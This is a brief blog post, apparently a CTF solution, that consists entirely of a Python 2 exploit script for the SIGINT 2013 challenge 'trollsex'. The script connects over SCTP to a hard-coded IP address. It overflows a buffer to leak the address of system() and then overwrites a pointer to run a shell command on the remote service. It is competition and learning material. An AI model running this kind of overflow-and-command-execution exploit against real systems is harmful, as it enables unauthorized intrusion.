Computer Security/CTF

[SIGINT 2013] trollsex(tr0llsex) exploit

tunz 2013. 7. 8. 01:05






import socket
import sctp
from struct import *
 
s = sctp.sctpsocket_tcp(socket.AF_INET)
s.connect(('188.40.147.118',1024))
#s.connect(('127.0.0.1',1024))
print s.recv(1024)
cmd = "system\x00"
s.sctp_send(cmd+"A"*(24-len(cmd))+pack('<Q',0x401120)+"EEEEEEEE"+"\n",stream=9)
get=s.recv(1024)
system=int(get[2:],16)
print "System: "+hex(system)
cmd = "id>&4\x00"
s.sctp_send(cmd+"A"*(24-len(cmd))+pack('<Q',system)+"EEEEEEEE"+"\n",stream=9)
get=s.recv(1024)
print get
 
s.close()